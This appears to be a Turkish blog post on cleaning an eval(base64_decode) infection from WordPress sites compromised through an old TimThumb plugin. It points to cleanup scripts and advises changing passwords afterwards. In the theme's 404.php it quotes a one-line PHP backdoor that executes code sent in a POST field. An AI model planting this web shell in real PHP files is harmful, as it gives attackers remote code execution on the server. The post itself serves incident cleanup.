WordPressten base64_decode zararlısının temizliği



WordPress bugünlerde en çok kullanılan CMS lerden biridir (content management system) bunun sebebi olarak belkide kolay kurulum , kullanım , free oluşu birçok ücretsiz tema ve plugin gösterilebilir


ilaveten bir tıkla plugin kurulumu sayesinde sayfanıza istediğiniz özelliği ekleyebilmenizde işin diğer hoş tarafı gel gelelim eğer eski ve güncel olmayan bir plugin kullanıyorsanız hacklenme olasılığınızda artıyor demektir örneğin bir yıl kadar önce yaygın şekilde kullanılan TimThumb PHP script i (Resim boyutlandırma scripti) sayesinde hackerlar birçok sisteme eval(base64_decode code) zararlısı bulaştırarak arama motorlarından gelen kullanıcıları istedikleri sayfalara yönlendirdiler . gzinflate/eval(base64_decode zararlısını aşağıdaki scriptlerle temizleyebilirsiniz:

Download Cleaner Script

Download Scanner Script

Fakat neyazıkki bu script tek başına yeterli olmamaktadır , temizlense ve resim boyutlandırma scripti olan TimThumb un son versionu yüklenmiş olsa bile wordpressiniz tekrar tekrar hacklenecektir bunun sebebi hackerların sisteme birkaç backdoors yerleştirmiş olmalarıdır bunların tespitinde kullanabileceğiniz güvenlik pluginlerinden biride Wordfence dir plugin tema dahil tüm wordpress dosyalarını kontrol edip eğer değişiklik varsa bunu bize vermektedir. fakat ne yazıkki paralı ve tüm backdoors ları bulmuyor.

gel gelelim bunları yaptıktan sonrada hacklenirseniz iş başa düştü demektir ve tüm dosyaları elle kontrol etmeniz gerekecektir (bu iş için Notepad ++ filtresini kullanabilirsiniz) örneğimizde 404.php temasında aşağıdaki ilave kodu bulundu

<?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

Bu tarz bir Backdoor temizlendikten sonra hackerlerin önü kesilmiş oldu , birde unutulmaması gereken şey bu tarz bir temizlikten sonra WordPress kullanıcı hesapları, FTP, cPanel ve databank şifrelerinizi mutlaka değiştirin.


Yorum Ekle

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Captcha